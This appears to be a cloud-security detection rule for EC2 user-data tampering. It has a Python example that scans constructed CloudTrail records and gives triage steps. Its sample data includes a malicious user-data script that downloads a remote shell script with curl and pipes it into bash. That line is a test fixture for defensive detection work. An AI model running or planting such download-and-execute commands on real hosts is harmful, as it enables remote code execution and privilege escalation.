Possible AWS EC2 privilege escalation via the modification of user data


Goal

Detect a user attempting to modify a user data script on an EC2 instance.

Strategy

This rule allows you to monitor CloudTrail and detect if an attacker has attempted to modify the user data script on an EC2 instance using the following API calls:

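The detection this strategy describes, worked through on sample data as an added example (this is not the Datadog rule's own query or code). It assumes the relevant API call is ModifyInstanceAttribute, which is what the aws-cli modify-instance-attribute command named in the triage steps issues, and that CloudTrail records the new script under requestParameters.userData.value, base64-encoded. The records, account ID, principals and instance IDs are constructed. Because user data can only be changed on a stopped instance, the example also pulls the StopInstances/StartInstances calls made by the same principal against the same host, which is the pivot an analyst wants in step 2 of the triage.

```python
import base64
import binascii

# Constructed identifiers for the sample records (not real accounts or hosts).
ACCOUNT = "123456789012"
ATTACKER = f"arn:aws:sts::{ACCOUNT}:assumed-role/DevRole/alice"
ADMIN = f"arn:aws:iam::{ACCOUNT}:user/ops-admin"
TARGET = "i-0123456789abcdef0"
MALICIOUS_SCRIPT = b"#!/bin/bash\ncurl -s http://198.51.100.7/p.sh | bash\n"


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Constructed CloudTrail records, not real log data. Top-level field names
# follow the CloudTrail record format; the layout of requestParameters for a
# userData change (userData.value holding the base64 script) is an assumption.
SAMPLE_RECORDS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "StopInstances",
     "userIdentity": {"type": "AssumedRole", "arn": ATTACKER},
     "requestParameters": {"instancesSet": {"items": [{"instanceId": TARGET}]}}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifyInstanceAttribute",
     "userIdentity": {"type": "AssumedRole", "arn": ATTACKER},
     "requestParameters": {"instanceId": TARGET,
                           "userData": {"value": _b64(MALICIOUS_SCRIPT)}}},
    {"eventTime": "2024-05-01T10:03:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "StartInstances",
     "userIdentity": {"type": "AssumedRole", "arn": ATTACKER},
     "requestParameters": {"instancesSet": {"items": [{"instanceId": TARGET}]}}},
    # Same API call, different attribute (a resize): must NOT be flagged.
    {"eventTime": "2024-05-01T11:00:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifyInstanceAttribute",
     "userIdentity": {"type": "IAMUser", "arn": ADMIN},
     "requestParameters": {"instanceId": "i-0fedcba9876543210",
                           "instanceType": {"value": "t3.large"}}},
    # A denied attempt: CloudTrail still records it, with errorCode set.
    {"eventTime": "2024-05-01T12:00:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "ModifyInstanceAttribute",
     "userIdentity": {"type": "IAMUser", "arn": ADMIN},
     "errorCode": "Client.UnauthorizedOperation",
     "requestParameters": {"instanceId": "i-0fedcba9876543210",
                           "userData": {"value": _b64(b"#!/bin/bash\necho hi\n")}}},
]


def is_user_data_change(rec: dict) -> bool:
    """True for any ModifyInstanceAttribute call carrying a userData attribute,
    whether or not it succeeded: the rule is about attempts, so failed calls count."""
    params = rec.get("requestParameters") or {}
    return (rec.get("eventSource") == "ec2.amazonaws.com"
            and rec.get("eventName") == "ModifyInstanceAttribute"
            and "userData" in params)


def decode_user_data(rec: dict) -> str:
    """Decode the submitted script so the analyst can read it; fall back to the
    raw value if it is not valid base64."""
    raw = rec["requestParameters"]["userData"].get("value", "")
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return raw


def _instance_ids(rec: dict) -> set:
    """Instance IDs referenced by a record, covering both the single-instance
    (instanceId) and the list (instancesSet.items[].instanceId) parameter shapes."""
    params = rec.get("requestParameters") or {}
    ids = set()
    if "instanceId" in params:
        ids.add(params["instanceId"])
    for item in (params.get("instancesSet") or {}).get("items", []):
        ids.add(item.get("instanceId"))
    return ids


def find_user_data_modifications(records: list) -> list:
    """One finding per user-data change attempt, with the StopInstances and
    StartInstances calls the same principal made against the same host."""
    findings = []
    for rec in records:
        if not is_user_data_change(rec):
            continue
        who = rec["userIdentity"].get("arn", "<unknown>")
        host = rec["requestParameters"].get("instanceId")
        lifecycle = [f'{r["eventTime"]} {r["eventName"]}'
                     for r in records
                     if r.get("eventName") in ("StopInstances", "StartInstances")
                     and r["userIdentity"].get("arn") == who
                     and host in _instance_ids(r)]
        findings.append({"time": rec["eventTime"], "principal": who, "host": host,
                         "succeeded": "errorCode" not in rec,
                         "script": decode_user_data(rec),
                         "lifecycle_calls": lifecycle})
    return findings


if __name__ == "__main__":
    for f in find_user_data_modifications(SAMPLE_RECORDS):
        print(f"{f['time']} {f['principal']} -> {f['host']} "
              f"succeeded={f['succeeded']} related={f['lifecycle_calls']}")
        print("  script:", f["script"].strip().replace("\n", " | "))
```

Run against the constructed records, the first finding is the attacker's stop, rewrite, start sequence on the target with the decoded download-and-execute script, and the second is the denied attempt by the admin user with no surrounding lifecycle calls; the instance-type change is ignored. The same filter (eventName plus the presence of userData in the request) is what a CloudTrail-based rule needs; the principal and host fields correspond to the @userIdentity and host values the triage steps refer to.
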
Triage and response

  1. Determine whether {{@userIdentity.session_name}} should have modified the user data script associated with {{host}}.
  2. If the API calls were not made by the user:
  • Rotate the user's credentials.
  • Determine what other API calls were made by the user. User data can only be changed while an instance is stopped, so look in particular for StopInstances and StartInstances calls against {{host}} by the same principal around the time of the change.
  • Follow your company's incident response process to determine the impact to {{host}}. Reverting the script does not undo anything it has already executed on the host.
  • Revert the user data script to the last known good state with the aws-cli command modify-instance-attribute (the instance must be stopped to do so) or use the AWS Console.
  3. If the API calls were made by the user:
  • Determine whether the user should be modifying this user data script.
  • If not, check whether the user made other API calls and determine if they warrant further investigation.